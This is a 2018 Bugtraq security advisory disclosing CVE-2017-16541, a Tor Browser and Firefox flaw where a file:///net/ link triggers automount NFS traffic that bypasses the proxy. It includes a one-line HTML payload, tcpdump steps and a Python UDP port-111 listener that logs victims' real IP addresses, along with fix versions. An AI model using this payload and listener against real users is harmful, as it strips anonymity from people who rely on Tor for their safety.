[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

CVE-2017-16541 details: Deanonymize Tor Browser Users with Automount

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: CVE-2017-16541 details: Deanonymize Tor Browser Users with Automount
From: Filippo Cavallarin <filippo.cavallarin@xxxxxxxxxxxxxxxx>
Date: Mon, 10 Sep 2018 15:06:49 +0200

Hi all,
there is the details for CVE-2017-16541 (Tor Browser information disclosure),

More infos at: 
https://www.wearesegment.com/research/tormoil-deanonymize-tor-browser-users-with-automount/



Tor Browser version 7.0.8, and probably prior, for Mac OS X and Linux, is 
affected by an information disclosure vulnerability that  leads to full 
de-anonymization of website visitors using just a single html tag. The 
vulnerability also affects Firefox (ver <= 62.0 / 60.2.0 ESR).

 

Vulnerability Details

The vulnerability exists because Firefox fails to prevent automount/autofs to 
be called within a webpage using file:// handler.
Basically automount is a program that allows NFS mount points to be 
automatically mounted when accessed. For example it can be configured to 
trigger a NFS connection to test.com:/mydir when /localdir is accessed from 
client machine.
Automount can also be configured to allow a path starting with ‘/net/’ to 
specify the remote server address and path, so ‘ls /net/test.com/a’ will 
trigger an NFS connection to test.com. This is the default configuration on Mac 
OSX.
This functionality can also be triggered in many ways from a webpage by calling 
the file:// handler, for example with: <link href=’file:///net/test.com/a.css’ 
rel=’stylesheet’>.
NFS mount points are handled by the kernel so there is no way for a browser to 
tunnel their connections thru a proxy.
An interesting part is that this vulnerability can be exploited even if 
javascript is disabled.
This vulnerability only affects Mac OS X users with default configuration and 
Linux user with automount package installed and configured properly.


PoC

To demostrate this issue follow the steps below:

host an html page with the following content:
<link href='file:///net/12.12.12.12/a.css' rel='stylesheet'>
 
 1.run a “tcpdump port 111”
 2.load the previously hosted page into Tor Browser

watch the output of tcpdump, you should see UDP packets sent to 12.12.12.12
To exploit this vulnerability to deanonymize a Tor Browser user an attacker 
needs to host the malicious page on a server he/she owns, trick the victim into 
load the malicius page and watch the output of tcpdump (running on the 
webserver).
Doing so the browser of the victim will show a loading indicator until a 
successful NFS is preformed of until the NFS timeout is reached.
As a result the victim may notice that something unusual is happening. To 
prevent this the attacker has (at least) two options:

 1.configure a NFS server so the victim’s machine will complete the connection 
without waiting
 2.listen to portmap requests (UDP port 111) and immediatley reject the 
connection

The problem of the first solution is that the mountpoint may remain visible to 
the victim and it also may leave some traces on the log files.
The second solution involves some python code that terminates gracefully RPC 
requests:

BIND_ADDR = "0.0.0.0"
BIND_PORT = 111

sok = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 try:
 sok.bind((BIND_ADDR, BIND_PORT))
 except Exception as e:
 print e
 sys.exit(1)

print "Waiting for victims on UDP port %d\n" % BIND_PORT
 while True:
 data, addr = sok.recvfrom(1024)
 ip = addr[0] 
 print("TRUE IP: %s" % ip)
 
 # reply with PROGRAM_NOT_AVAILABLE to drop connection 
 # first 4bytes are packet id, the last 4 mean "port 0"

rpl = data[:4] + "\x00\x00\x00\x01" + bytearray(20)

if not sok.sendto(rpl, addr):
 print "Error sending reply to %s" % ip

Due to it’s nature, Tormoil can de-anonymize both visitors of  hidden services 
and visitors of regular internet websites and can also be “injected” using Man 
In The Middle techniques (ex exit node owners).


History

This vulnerability has been discovered and reported to the Tor Project on 
10-26-2017 and got fixed in a matter of days.
Tor Browser is based on Firefox that was also affected by the same 
vulnerability, but since the Firefox team rated this vulnerability as moderate 
it took longer to get fixed.
In the meantime the Tor Browser team applied a temporary fix to their browser 
that prevents any access to file:// resources.
This was a perfectly coherent solution since the focus of Tor Browser is user’s 
anonymity. However this fix broke a legitimate functionality of a “normal” 
browser so the Firefox team did’t implemented this solution.
Instead they worked on a solution for months to build a blacklisting mechanism 
that filters out “dangerous” paths and prevents the trigger of automount.



Solution

Update Tor Browser to version 7.0.9

Update Firefox to version 62.0  or 60.2.0 ESR

 

References

https://blog.torproject.org/tor-browser-709-released
https://www.wearesegment.com/research/tormoil-deanonymize-tor-browser-users-with-automount/


Credits

Filippo Cavallarin (filippo.cavallarin@xxxxxxxxxxxxxxxx)

Prev by Date: [SECURITY] [DSA 4289-1] chromium-browser security update
Next by Date: [SECURITY] [DSA 4290-1] libextractor security update
Previous by thread: [SECURITY] [DSA 4289-1] chromium-browser security update
Next by thread: [SECURITY] [DSA 4290-1] libextractor security update
Index(es):
- Date
- Thread